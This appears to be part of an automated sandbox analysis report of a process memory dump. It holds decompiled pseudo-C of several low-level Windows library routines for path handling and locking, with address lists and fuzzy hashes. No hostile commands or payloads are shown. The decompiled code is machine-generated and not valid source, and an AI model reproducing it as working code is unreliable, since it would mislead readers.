*_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2]; } } _t181 = _v544; if(_t181 != 0) { *_t181 = 0; *((intOrPtr*)(_t181 + 4)) = 0; *((intOrPtr*)(_t181 + 8)) = 0; *((intOrPtr*)(_t181 + 0xc)) = 0; if(_v540 == 5) { _t182 = E010B52A5(1); _v588 = _t182; if(_t182 == 0) { E010CEB70(1, 0x11a79a0); goto L38; } else { _v560 = _t182 + 0xc; _t185 = E010CAA20( &_v556, _t182 + 0xc, &_v556, 1); if(_t185 == 0) { _t324 = _v588; goto L97; } else { _t306 = _v544; _t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2]; *(_t306 + 4) = _t282; _v576 = _t282; _t325 = _t316 - *_v560 & 0x0000ffff; *_t306 = _t325; if( *_t282 == 0x5c) { _t149 = _t325 - 2; // -2 _t283 = _t149; *_t306 = _t283; *(_t306 + 4) = _v576 + 2; _t185 = _t283 & 0x0000ffff; } _t324 = _v588; *(_t306 + 2) = _t185; if((_v548 & 0x00000002) == 0) { L97: asm("lock xadd [esi], eax"); if((_t185 | 0xffffffff) == 0) { _push( *((intOrPtr*)(_t324 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324); } } else { *(_t306 + 0xc) = _t324; *((intOrPtr*)(_t306 + 8)) = *((intOrPtr*)(_t324 + 4)); } goto L38; } } goto L41; } } L38: _t322 = 0; } } } } L39: if(_t254 != &_v532) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254); } _t169 = _t322; } goto L41; } goto L68; } } L41: _pop(_t317); _pop(_t323); _pop(_t255); return E010FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323); } else { _t299 = __edx[2]; if( *_t299 == 0x5c) { _t256 = *(_t299 + 2) & 0x0000ffff; if(_t256 != 0x5c) { if(_t256 != 0x3f) { goto L2; } else { goto L50; } } else { L50: if( *((short*)(_t299 + 4)) != 0x3f || *((short*)(_t299 + 6)) != 0x5c) { goto L2; } else { _t251 = E010F3D43(_t315, _t321, _t157, _v560, _v572, _t305); _pop(_t319); _pop(_t326); _pop(_t257); return E010FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326); } } } else { L2: _t260 = _v572; goto L3; } } L101: } 0x010d4128 0x010d4135 0x010d413c 0x010d4141 0x010d4145 0x010d4147 0x010d414e 0x010d4151 0x010d4159 0x010d415c 0x010d4160 0x010d4164 0x010d4168 0x010d416c 0x010d417f 0x010d4181 0x010d446a 0x010d446a 0x010d418c 0x010d4195 0x010d4199 0x010d4432 0x010d4439 0x010d443d 0x010d4442 0x010d4447 0x00000000 0x010d419f 0x010d41a3 0x010d41b1 0x010d41b9 0x010d41bd 0x010d45db 0x010d45db 0x00000000 0x010d41c3 0x010d41c3 0x010d41ce 0x010d41d4 0x0111e138 0x0111e13e 0x0111e169 0x0111e16d 0x0111e19e 0x0111e16f 0x0111e16f 0x0111e175 0x0111e179 0x0111e18f 0x0111e193 0x00000000 0x0111e199 0x00000000 0x0111e199 0x0111e193 0x00000000 0x00000000 0x00000000 0x010d41da 0x010d41da 0x010d41df 0x010d41e4 0x010d41ec 0x010d4203 0x010d4207 0x0111e1fd 0x010d4222 0x010d4226 0x0111e1f3 0x0111e1f3 0x010d422c 0x010d422c 0x010d4233 0x0111e1ed 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x010d4239 0x010d4239 0x010d4239 0x010d4239 0x010d4233 0x010d4226 0x010d41ee 0x010d41ee 0x010d41f4 0x010d4575 0x0111e1b1 0x0111e1b1 0x00000000 0x010d457b 0x010d457b 0x010d4582 0x0111e1ab 0x00000000 0x00000000 0x00000000 0x00000000 0x010d4588 0x010d4588 0x010d458c 0x0111e1c4 0x0111e1c4 0x00000000 0x010d4592 0x010d4592 0x010d4599 0x0111e1be 0x00000000 0x00000000 0x00000000 0x00000000 0x010d459f 0x010d459f 0x010d45a3 0x0111e1d7 0x0111e1e4 0x00000000 0x010d45a9 0x010d45a9 0x010d45b0 0x0111e1d1 0x00000000 0x00000000 0x00000000 0x00000000 0x010d45b6 0x010d45b6 0x010d45b6 0x00000000 0x010d45b6 0x010d45b0 0x010d45a3 0x010d4599 0x010d458c 0x010d4582 0x00000000 0x00000000 0x00000000 0x00000000 0x010d41f4 0x010d423e 0x010d4241 0x010d45c0 0x010d45c4 0x00000000 0x010d45ca 0x010d45ca 0x00000000 0x0111e207 0x0111e20f 0x00000000 0x00000000 0x00000000 0x00000000 0x010d45d1 0x00000000 0x00000000 0x010d45ca 0x00000000 0x010d4247 0x010d4247 0x010d4247 0x010d4249 0x010d4249 0x010d4249 0x010d4251 0x010d4251 0x010d4257 0x010d425f 0x010d426e 0x010d4270 0x010d427a 0x0111e219 0x0111e219 0x010d4280 0x010d4282 0x010d4456 0x010d45ea 0x00000000 0x010d45f0 0x0111e223 0x00000000 0x0111e223 0x010d445c 0x010d445c 0x00000000 0x010d445c 0x00000000 0x010d4288 0x010d428c 0x0111e298 0x010d4292 0x010d4292 0x010d429e 0x010d42a3 0x010d42a7 0x010d42ac 0x0111e22d 0x010d42b2 0x010d42b2 0x010d42b9 0x010d42bc 0x010d42c2 0x010d42ca 0x010d42cd 0x010d42cd 0x010d42d4 0x010d433f 0x010d433f 0x010d42d6 0x010d42d6 0x010d42d9 0x010d42dd 0x010d42eb 0x0111e23a 0x010d42f1 0x010d4305 0x010d430d 0x010d4315 0x010d4318 0x010d431f 0x010d4322 0x010d432e 0x010d433b 0x010d433b 0x00000000 0x010d432e 0x010d42eb 0x010d434c 0x010d434e 0x010d4352 0x010d4359 0x010d435e 0x010d4361 0x010d436e 0x010d438a 0x010d438e 0x010d4396 0x010d439e 0x010d43a1 0x010d43ad 0x010d43bb 0x010d43bb 0x010d43ad 0x010d436e 0x010d43bf 0x010d43c5 0x010d4463 0x010d4463 0x010d43ce 0x010d43d5 0x010d43d9 0x010d43df 0x010d4475 0x010d4479 0x010d4491 0x010d4491 0x010d4479 0x010d43e5 0x010d43eb 0x010d43f4 0x010d43f6 0x010d43f9 0x010d43fc 0x010d43ff 0x010d44e8 0x010d44ed 0x010d44f3 0x0111e247 0x00000000 0x010d44f9 0x010d4504 0x010d4508 0x010d450f 0x0111e269 0x00000000 0x010d4515 0x010d4519 0x010d4531 0x010d4534 0x010d4537 0x010d453e 0x010d4541 0x010d454a 0x0111e255 0x0111e255 0x0111e25b 0x0111e25e 0x0111e261 0x0111e261 0x010d4555 0x010d4559 0x010d455d 0x0111e26d 0x0111e270 0x0111e274 0x0111e27a 0x0111e27d 0x0111e28e 0x0111e28e 0x010d4563 0x010d4563 0x010d4569 0x010d4569 0x00000000 0x010d455d 0x010d450f 0x00000000 0x010d44f3 0x010d43ff 0x010d4405 0x010d4405 0x010d4405 0x010d42ac 0x010d428c 0x010d4282 0x010d4407 0x010d440d 0x0111e2af 0x0111e2af 0x010d4413 0x010d4413 0x00000000 0x010d41d4 0x00000000 0x010d41c3 0x010d41bd 0x010d4415 0x010d4415 0x010d4416 0x010d4417 0x010d4429 0x010d416e 0x010d416e 0x010d4175 0x010d4498 0x010d449f 0x0111e12d 0x00000000 0x0111e133 0x00000000 0x0111e133 0x010d44a5 0x010d44a5 0x010d44aa 0x00000000 0x010d44bb 0x010d44ca 0x010d44d6 0x010d44d7 0x010d44d8 0x010d44e3 0x010d44e3 0x010d44aa 0x010d417b 0x010d417b 0x010d417b 0x00000000 0x010d417b 0x010d4175 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: a80b26405b9b901e7b51bee3005d4a706fc16adba2a08d054ef22d1736ebb1d4 Instruction ID: e9b5c896add012df5e15cf041644e401150859f91a8728783661305f0812ffea Opcode Fuzzy Hash: a80b26405b9b901e7b51bee3005d4a706fc16adba2a08d054ef22d1736ebb1d4 Instruction Fuzzy Hash: 12F16B706083118BC729CF59C490A7ABBE1FF88714F44896EF9C6CBA51EB34D885CB52

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%

E010E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) { signed int _v16; signed int _v20; signed char _v24; intOrPtr _v28; signed int _v32; void* _v36; char _v48; signed int _v52; signed int _v56; unsigned int _v60; char _v64; unsigned int _v68; signed int _v72; char _v73; signed int _v74; char _v75; signed int _v76; void* _v81; void* _v82; void* _v89; void* _v92; void* _v97; void* __edi; void* __esi; void* __ebp; signed char _t128; void* _t129; signed int _t130; void* _t132; signed char _t133; intOrPtr _t135; signed int _t137; signed int _t140; signed int* _t144; signed int* _t145; intOrPtr _t146; signed int _t147; signed char* _t148; signed int _t149; signed int _t153; signed int _t169; signed int _t174; signed int _t180; void* _t197; void* _t198; signed int _t201; intOrPtr* _t202; intOrPtr* _t205; signed int _t210; signed int _t215; signed int _t218; signed char _t221; signed int _t226; char _t227; signed int _t228; void* _t229; unsigned int _t231; void* _t235; signed int _t240; signed int _t241; void* _t242; signed int _t246; signed int _t248; signed int _t252; signed int _t253; void* _t254; intOrPtr* _t256; intOrPtr _t257; unsigned int _t262; signed int _t265; void* _t267; signed int _t275; _t198 = __ebx; _t267 = (_t265 & 0xfffffff0) - 0x48; _v68 = __ecx; _v73 = 0; _t201 = __edx & 0x00002000; _t128 = __edx & 0xffffdfff; _v74 = __edx & 0xffffff00 | __eflags != 0x00000000; _v72 = _t128; if((_t128 & 0x00000008) != 0) { __eflags = _t128 - 8; if(_t128 != 8) { L69: _t129 = 0xc000000d; goto L23; } else { _t130 = 0; _v72 = 0; _v75 = 1; L2: _v74 = 1; _t226 = *0x11a8714; // 0x0 if(_t226 != 0) { __eflags = _t201; if(_t201 != 0) { L62: _v74 = 1; L63: _t130 = _t226 & 0xffffdfff; _v72 = _t130; goto L3; } _v74 = _t201; __eflags = _t226 & 0x00002000; if((_t226 & 0x00002000) == 0) { goto L63; } goto L62; } L3: _t227 = _v75; L4: _t240 = 0; _v56 = 0; _t252 = _t130 & 0x00000100; if(_t252 != 0 || _t227 != 0) { _t240 = _v68; _t132 = E010E2EB0(_t240); __eflags = _t132 - 2; if(_t132 != 2) { __eflags = _t132 - 1; if(_t132 == 1) { goto L25; } __eflags = _t132 - 6; if(_t132 == 6) { __eflags = *((short*)(_t240 + 4)) - 0x3f; if( *((short*)(_t240 + 4)) != 0x3f) { goto L40; } _t197 = E010E2EB0(_t240 + 8); __eflags = _t197 - 2; if(_t197 == 2) { goto L25; } } L40: _t133 = 1; L26: _t228 = _v75; _v56 = _t240; __eflags = _t133; if(_t133 != 0) { __eflags = _t228; if(_t228 == 0) { L43: __eflags = _v72; if(_v72 == 0) { goto L8; } goto L69; } _t133 = E010B58EC(_t240); _t221 = *0x11a5cac; // 0x16 __eflags = _t221 & 0x00000040; if((_t221 & 0x00000040) != 0) { _t228 = 0; __eflags = _t252; if(_t252 != 0) { goto L43; } _t133 = _v72; goto L7; } goto L43; } else { _t133 = _v72; goto L6; } } L25: _t133 = _v73; goto L26; } else { L6: _t221 = *0x11a5cac; // 0x16 L7: if(_t133 != 0) { __eflags = _t133 & 0x00001000; if((_t133 & 0x00001000) != 0) { _t133 = _t133 | 0x00000a00; __eflags = _t221 & 0x00000004; if((_t221 & 0x00000004) != 0) { _t133 = _t133 | 0x00000400; } } __eflags = _t228; if(_t228 != 0) { _t133 = _t133 | 0x00000100; } _t229 = E010F4A2C(0x11a6e40, 0x10f4b30, _t133, _t240); __eflags = _t229; if(_t229 == 0) { _t202 = _a20; goto L100; } else { _t135 = *((intOrPtr*)(_t229 + 0x38)); L15: _t202 = _a20; *_t202 = _t135; if(_t229 == 0) { L100: *_a4 = 0; _t137 = _a8; __eflags = _t137; if(_t137 != 0) { *_t137 = 0; } *_t202 = 0; _t129 = 0xc0000017; goto L23; } else { _t242 = _a16; if(_t242 != 0) { _t254 = _t229; memcpy(_t242, _t254, 0xd << 2); _t267 = _t267 + 0xc; _t242 = _t254 + 0x1a; } _t205 = _a4; _t25 = _t229 + 0x48; // 0x48 *_t205 = _t25; _t140 = _a8; if(_t140 != 0) { __eflags = *((char*)(_t267 + 0xa)); if( *((char*)(_t267 + 0xa)) != 0) { *_t140 = *((intOrPtr*)(_t229 + 0x44)); } else { *_t140 = 0; } } _t256 = _a12; if(_t256 != 0) { *_t256 = *((intOrPtr*)(_t229 + 0x3c)); } _t257 = *_t205; _v48 = 0; *((intOrPtr*)(_t267 + 0x2c)) = 0; _v56 = 0; _v52 = 0; _t144 = *( *[fs:0x30] + 0x50); if(_t144 != 0) { __eflags = *_t144; if( *_t144 == 0) { goto L20; } _t145 = &(( *( *[fs:0x30] + 0x50))[0x8a]); goto L21; } else { L20: _t145 = 0x7ffe0384; L21: if( *_t145 != 0) { _t146 = *[fs:0x30]; __eflags = *(_t146 + 0x240) & 0x00000004; if(( *(_t146 + 0x240) & 0x00000004) != 0) { _t147 = E010D7D50(); __eflags = _t147; if(_t147 == 0) { _t148 = 0x7ffe0385; } else { _t148 = &(( *( *[fs:0x30] + 0x50))[0x8a]); } __eflags = *_t148 & 0x00000020; if(( *_t148 & 0x00000020) != 0) { _t149 = _v72; __eflags = _t149; if(__eflags == 0) { _t149 = 0x1095c80; } _push(_t149); _push( &_v48); *((char*)(_t267 + 0xb)) = E010EF6E0(_t198, _t242, _t257, __eflags); _push(_t257); _push( &_v64); _t153 = E010EF6E0(_t198, _t242, _t257, __eflags); __eflags = *((char*)(_t267 + 0xb)); if( *((char*)(_t267 + 0xb)) != 0) { __eflags = _t153; if(_t153 != 0) { __eflags = 0; E01137016(0x14c1, 0, 0, 0, &_v72, &_v64); L010D2400(_t267 + 0x20); } L010D2400( &_v64); } } } } _t129 = 0; L23: return _t129; } } } } L8: _t275 = _t240; if(_t275 != 0) { _v73 = 0; _t253 = 0; __eflags = 0; L29: _push(0); _t241 = E010E2397(_t240); __eflags = _t241; if(_t241 == 0) { _t229 = 0; L14: _t135 = 0; goto L15; } __eflags = *((char*)(_t267 + 0xb)); *(_t241 + 0x34) = 1; if( *((char*)(_t267 + 0xb)) != 0) { E010D2280(_t134, 0x11a8608); __eflags = *0x11a6e48 - _t253; // 0x5eb158 if(__eflags != 0) { L48: _t253 = 0; __eflags = 0; L49: E010CFFB0(_t198, _t241, 0x11a8608); __eflags = _t253; if(_t253 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253); } goto L31; } *0x11a6e48 = _t241; *(_t241 + 0x34) = *(_t241 + 0x34) + 1; __eflags = _t253; if(_t253 != 0) { _t57 = _t253 + 0x34; *_t57 = *(_t253 + 0x34) + 0xffffffff; __eflags = *_t57; if( *_t57 == 0) { goto L49; } } goto L48; } L31: _t229 = _t241; goto L14; } _v73 = 1; _v64 = _t240; asm("lock bts dword [esi], 0x0"); if(_t275 < 0) { _t231 = *0x11a8608; // 0x0 while(1) { _v60 = _t231; __eflags = _t231 & 0x00000001; if((_t231 & 0x00000001) != 0) { goto L76; } _t73 = _t231 + 1; // 0x1 _t210 = _t73; asm("lock cmpxchg [edi], ecx"); __eflags = _t231 - _t231; if(_t231 != _t231) { L92: _t133 = E010E6B90(_t210, &_v64); _t262 = *0x11a8608; // 0x0 L93: _t231 = _t262; continue; } _t240 = _v56; goto L10; L76: _t169 = E010EE180(_t133); __eflags = _t169; if(_t169 != 0) { _push(0xc000004b); _push(0xffffffff); E010F97C0(); _t231 = _v68; } _v72 = 0; _v24 = *( *[fs:0x18] + 0x24); _v16 = 3; _v28 = 0; __eflags = _t231 & 0x00000002; if((_t231 & 0x00000002) == 0) { _v32 = &_v36; _t174 = _t231 >> 4; __eflags = 1 - _t174; _v20 = _t174; asm("sbb ecx, ecx"); _t210 = 3 | &_v36; __eflags = _t174; if(_t174 == 0) { _v20 = 0xfffffffe; } } else { _v32 = 0; _v20 = 0xffffffff; _v36 = _t231 & 0xfffffff0; _t210 = _t231 & 0x00000008 | &_v36 | 0x00000007; _v72 = !(_t231 >> 2) & 0xffffff01; } asm("lock cmpxchg [edi], esi"); _t262 = _t231; __eflags = _t262 - _t231; if(_t262 != _t231) { goto L92; } else { __eflags = _v72; if(_v72 != 0) { E010F006A(0x11a8608, _t210); } __eflags = *0x7ffe036a - 1; if(__eflags <= 0) { L89: _t133 = &_v16; asm("lock btr dword [eax], 0x1"); if(__eflags >= 0) { goto L93; } else { goto L90; } do { L90: _push(0); _push(0x11a8608); E010FB180(); _t133 = _v24; __eflags = _t133 & 0x00000004; } while ((_t133 & 0x00000004) == 0); goto L93; } else { _t218 = *0x11a6904; // 0x400 __eflags = _t218; if(__eflags == 0) { goto L89; } else { goto L87; } while(1) { L87: __eflags = _v16 & 0x00000002; if(__eflags == 0) { goto L89; } asm("pause"); _t218 = _t218 - 1; __eflags = _t218; if(__eflags != 0) { continue; } goto L89; } goto L89; } } } } L10: _t229 = *0x11a6e48; // 0x5eb158 _v72 = _t229; if(_t229 == 0 || *((char*)(_t229 + 0x40)) == 0 && *((intOrPtr*)(_t229 + 0x38)) != *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) { E010CFFB0(_t198, _t240, 0x11a8608); _t253 = _v76; goto L29; } else { *((intOrPtr*)(_t229 + 0x34)) = *((intOrPtr*)(_t229 + 0x34)) + 1; asm("lock cmpxchg [esi], ecx"); _t215 = 1; if(1 != 1) { while(1) { _t246 = _t215 & 0x00000006; _t180 = _t215; __eflags = _t246 - 2; _v56 = _t246; _t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215; asm("lock cmpxchg [edi], esi"); _t248 = _v56; __eflags = _t180 - _t215; if(_t180 == _t215) { break; } _t215 = _t180; } __eflags = _t248 - 2; if(_t248 == 2) { __eflags = 0; E010F00C2(0x11a8608, 0, _t235); } _t229 = _v72; } goto L14; } } } } _t227 = 0; _v75 = 0; if(_t128 != 0) { goto L4; } goto L2; } 0x010e20a0 0x010e20a8 0x010e20ad 0x010e20b3 0x010e20b8 0x010e20c2 0x010e20c7 0x010e20cb 0x010e20d2 0x010e2263 0x010e2266 0x01125836 0x01125836 0x00000000 0x010e226c 0x010e226c 0x010e2270 0x010e2274 0x010e20e2 0x010e20e2 0x010e20e6 0x010e20ee 0x011257dc 0x011257de 0x011257ec 0x011257ec 0x011257f1 0x011257f3 0x011257f8 0x00000000 0x011257f8 0x011257e0 0x011257e4 0x011257ea 0x00000000 0x00000000 0x00000000 0x011257ea 0x010e20f4 0x010e20f4 0x010e20f8 0x010e20f8 0x010e20fc 0x010e2100 0x010e2106 0x010e2201 0x010e2206 0x010e220b 0x010e220e 0x010e22a9 0x010e22ac 0x00000000 0x00000000 0x010e22b2 0x010e22b5 0x01125801 0x01125806 0x00000000 0x00000000 0x01125810 0x01125815 0x01125818 0x00000000 0x00000000 0x0112581e 0x010e22bb 0x010e22bb 0x010e2218 0x010e2218 0x010e221c 0x010e2220 0x010e2222 0x010e22c2 0x010e22c4 0x010e22dc 0x010e22dc 0x010e22e1 0x00000000 0x00000000 0x00000000 0x010e22e7 0x010e22c8 0x010e22cd 0x010e22d3 0x010e22d6 0x01125823 0x01125825 0x01125827 0x00000000 0x00000000 0x0112582d 0x00000000 0x0112582d 0x00000000 0x010e2228 0x010e2228 0x00000000 0x010e2228 0x010e2222 0x010e2214 0x010e2214 0x00000000 0x010e2114 0x010e2114 0x010e2114 0x010e211a 0x010e211c 0x010e2348 0x010e234d 0x01125840 0x01125845 0x01125848 0x0112584e 0x0112584e 0x01125848 0x010e2353 0x010e2355 0x010e2388 0x010e2388 0x010e2368 0x010e236a 0x010e236c 0x010e238f 0x00000000 0x010e236e 0x010e236e 0x010e218e 0x010e218e 0x010e2191 0x010e2195 0x01125a03 0x01125a06 0x01125a0c 0x01125a0f 0x01125a11 0x01125a13 0x01125a13 0x01125a19 0x01125a1f 0x00000000 0x010e219b 0x010e219b 0x010e21a0 0x010e2282 0x010e2284 0x010e2284 0x010e2284 0x010e2284 0x010e21a6 0x010e21a9 0x010e21ac 0x010e21ae 0x010e21b3 0x010e228b 0x010e2290 0x010e2379 0x010e2296 0x010e2298 0x010e2298 0x010e2290 0x010e21b9 0x010e21be 0x010e22a2 0x010e22a2 0x010e21c4 0x010e21c8 0x010e21cc 0x010e21d0 0x010e21d4 0x010e21de 0x010e21e3 0x01125a29 0x01125a2c 0x00000000 0x00000000 0x01125a3b 0x00000000 0x010e21e9 0x010e21e9 0x010e21e9 0x010e21ee 0x010e21f1 0x01125a45 0x01125a4b 0x01125a52 0x01125a58 0x01125a5d 0x01125a5f 0x01125a71 0x01125a61 0x01125a6a 0x01125a6a 0x01125a76 0x01125a79 0x01125a7f 0x01125a83 0x01125a85 0x01125a87 0x01125a87 0x01125a8c 0x01125a91 0x01125a97 0x01125a9f 0x01125aa0 0x01125aa1 0x01125aa6 0x01125aab 0x01125ab1 0x01125ab3 0x01125ab9 0x01125aca 0x01125ad4 0x01125ad4 0x01125ade 0x01125ade 0x01125aab 0x01125a79 0x01125a52 0x010e21f7 0x010e21f9 0x010e21fe 0x010e21fe 0x010e21e3 0x010e2195 0x010e236c 0x010e2122 0x010e2122 0x010e2124 0x010e2231 0x010e2236 0x010e2236 0x010e2238 0x010e2238 0x010e2240 0x010e2242 0x010e2244 0x011259fc 0x010e218c 0x010e218c 0x00000000 0x010e218c 0x010e224a 0x010e224f 0x010e2256 0x010e2304 0x010e2309 0x010e230f 0x010e231e 0x010e231e 0x010e231e 0x010e2320 0x010e2325 0x010e232a 0x010e232c 0x010e233e 0x010e233e 0x00000000 0x010e232c 0x010e2311 0x010e2317 0x010e231a 0x010e231c 0x010e2380 0x010e2380 0x010e2380 0x010e2384 0x00000000 0x00000000 0x010e2386 0x00000000 0x010e231c 0x010e225c 0x010e225c 0x00000000 0x010e225c 0x010e212a 0x010e2134 0x010e2138 0x010e213d 0x01125858 0x01125863 0x01125863 0x01125867 0x0112586a 0x00000000 0x00000000 0x0112586c 0x0112586c 0x01125871 0x01125875 0x01125877 0x01125997 0x0112599c 0x011259a1 0x011259a7 0x011259a7 0x00000000 0x011259a7 0x0112587d 0x00000000 0x0112588b 0x0112588b 0x01125890 0x01125892 0x01125894 0x01125899 0x0112589b 0x011258a0 0x011258a0 0x011258aa 0x011258b2 0x011258b6 0x011258be 0x011258c6 0x011258c9 0x0112590d 0x01125917 0x0112591a 0x0112591c 0x01125920 0x01125928 0x0112592a 0x0112592c 0x0112592e 0x0112592e 0x011258cb 0x011258cd 0x011258d8 0x011258e0 0x011258f4 0x011258fe 0x011258fe 0x0112593a 0x0112593e 0x01125940 0x01125942 0x00000000 0x01125944 0x01125944 0x01125949 0x0112594e 0x0112594e 0x01125953 0x0112595b 0x01125976 0x01125976 0x0112597a 0x0112597f 0x00000000 0x00000000 0x00000000 0x00000000 0x01125981 0x01125981 0x01125981 0x01125983 0x01125988 0x0112598d 0x01125991 0x01125991 0x00000000 0x0112595d 0x0112595d 0x01125963 0x01125965 0x00000000 0x00000000 0x00000000 0x00000000 0x01125967 0x01125967 0x0112596b 0x0112596d 0x00000000 0x00000000 0x0112596f 0x01125971 0x01125971 0x01125974 0x00000000 0x00000000 0x00000000 0x01125974 0x00000000 0x01125967 0x0112595b 0x01125942 0x01125863 0x010e2143 0x010e2143 0x010e2149 0x010e214f 0x010e22f1 0x010e22f6 0x00000000 0x010e2173 0x010e2173 0x010e217d 0x010e2181 0x010e2186 0x011259ae 0x011259b2 0x011259b5 0x011259b7 0x011259ba 0x011259cd 0x011259d1 0x011259d5 0x011259d9 0x011259db 0x00000000 0x00000000 0x011259dd 0x011259dd 0x011259e1 0x011259e4 0x011259e7 0x011259ee 0x011259ee 0x011259f3 0x011259f3 0x00000000 0x010e2186 0x010e214f 0x010e2106 0x010e2266 0x010e20d8 0x010e20da 0x010e20e0 0x00000000 0x00000000 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 792e5ef4bdf441a016b0ca81af0b262ada71c6c609de443437bbd9a571e4e31d Instruction ID: 12f3680c72ecb418832f1db0ed9e1bfb3a9ba79120ad0f81dc3120609f974173 Opcode Fuzzy Hash: 792e5ef4bdf441a016b0ca81af0b262ada71c6c609de443437bbd9a571e4e31d Instruction Fuzzy Hash: 87F159316083119FEB6ACF2DC4847AE7BEABF85324F08855DE9D59B281D774D841CB82

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E010CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) { signed int _v8; intOrPtr _v20; signed int _v36; intOrPtr* _v40; signed int _v44; signed int _v48; signed char _v52; signed int _v60; signed int _v64; signed int _v68; signed int _v72; signed int _v76; intOrPtr _v80; signed int _v84; intOrPtr _v100; intOrPtr _v104; signed int _v108; signed int _v112; signed int _v116; intOrPtr _v120; signed int _v132; char _v140; char _v144; char _v157; signed int _v164; signed int _v168; signed int _v169; intOrPtr _v176; signed int _v180; signed int _v184; intOrPtr _v188; signed int _v192; signed int _v200; signed int _v208; intOrPtr* _v212; char _v216; void* __ebx; void* __edi; void* __esi; void* __ebp; signed int _t204; signed int _t206; void* _t208; signed int _t211; signed int _t216; intOrPtr _t217; intOrPtr* _t218; signed int _t226; signed int _t239; signed int* _t247; signed int _t249; void* _t252; signed int _t256; signed int _t269; signed int _t271; signed int _t277; signed int _t279; intOrPtr _t283; signed int _t287; signed int _t288; void* _t289; signed char _t290; signed int _t292; signed int* _t293; unsigned int _t297; signed int _t306; signed int _t307; signed int _t308; signed int _t309; signed int _t310; intOrPtr _t311; intOrPtr _t312; signed int _t319; signed int _t320; signed int* _t324; signed int _t337; signed int _t338; signed int _t339; signed int* _t340; void* _t341; signed int _t344; signed int _t348; signed int _t349; signed int _t351; intOrPtr _t353; void* _t354; signed int _t356; signed int _t358; intOrPtr _t359; signed int _t361; signed int _t363; signed short* _t365; void* _t367; intOrPtr _t369; void* _t370; signed int _t371; signed int _t372; void* _t374; signed int _t376; void* _t384; signed int _t387; _v8 = *0x11ad360 ^ _t376; _t2 = &_a20; *_t2 = _a20 & 0x00000001; _t287 = _a4; _v200 = _a12; _t365 = _a8; _v212 = _a16; _v180 = _a24; _v168 = 0; _v157 = 0; if( *_t2 != 0) { __eflags = E010C6600(0x11a52d8); if(__eflags == 0) { goto L1; } else { _v188 = 6; } } else { L1: _v188 = 9; } if(_t365 == 0) { _v164 = 0; goto L5; } else { _t363 = *_t365 & 0x0000ffff; _t341 = _t363 + 1; if((_t365[1] & 0x0000ffff) < _t341) { L109: __eflags = _t341 - 0x80; if(_t341 <= 0x80) { _t281 = &_v140; _v164 = &_v140; goto L114; } else { _t283 = *0x11a7b9c; // 0x0 _t281 = L010D4620(_t341, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341); _v164 = _t281; __eflags = _t281; if(_t281 != 0) { _v157 = 1; L114: E010FF3E0(_t281, _t365[2], _t363); _t200 = _v164; *((char*)(_v164 + _t363)) = 0; goto L5; } else { _t204 = 0xc000009a; goto L47; } } } else { _t200 = _t365[2]; _v164 = _t200; if( *((char*)(_t200 + _t363)) != 0) { goto L109; } else { while(1) { L5: _t353 = 0; _t342 = 0x1000; _v176 = 0; if(_t287 == 0) { break; } _t384 = _t287 - *0x11a7b90; // 0x775e0000 if(_t384 == 0) { _t353 = *0x11a7b8c; // 0x5e2b98 _v176 = _t353; _t320 = ( *(_t353 + 0x50))[8]; _v184 = _t320; } else { E010D2280(_t200, 0x11a84d8); _t277 = *0x11a85f4; // 0x5e3ef0 _t351 = *0x11a85f8 & 1; while(_t277 != 0) { _t337 = *(_t277 - 0x50); if(_t337 > _t287) { _t338 = _t337 | 0xffffffff; } else { asm("sbb ecx, ecx"); _t338 = ~_t337; } _t387 = _t338; if(_t387 < 0) { _t339 = *_t277; __eflags = _t351; if(_t351 != 0) { __eflags = _t339; if(_t339 == 0) { goto L16; } else { goto L118; } goto L151; } else { goto L16; } goto L17; } else { if(_t387 <= 0) { __eflags = _t277; if(_t277 != 0) { _t340 = *(_t277 - 0x18); _t24 = _t277 - 0x68; // 0x5e3e88 _t353 = _t24; _v176 = _t353; __eflags = _t340[3] - 0xffffffff; if(_t340[3] != 0xffffffff) { _t279 = *_t340; __eflags = *(_t279 - 0x20) & 0x00000020; if(( *(_t279 - 0x20) & 0x00000020) == 0) { asm("lock inc dword [edi+0x9c]"); _t340 = *(_t353 + 0x50); } } _v184 = _t340[8]; } } else { _t339 = *(_t277 + 4); if(_t351 != 0) { __eflags = _t339; if(_t339 == 0) { goto L16; } else { L118: _t277 = _t277 ^ _t339; goto L17; } goto L151; } else { L16: _t277 = _t339; } goto L17; } } goto L25; L17: } L25: E010CFFB0(_t287, _t353, 0x11a84d8); _t320 = _v184; _t342 = 0x1000; } if(_t353 == 0) { break; } else { _t366 = 0; if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) { _t288 = _v164; if(_t353 != 0) { _t342 = _t288; _t374 = E0110CC99(_t353, _t288, _v200, 1, &_v168); if(_t374 >= 0) { if(_v184 == 7) { __eflags = _a20; if(__eflags == 0) { 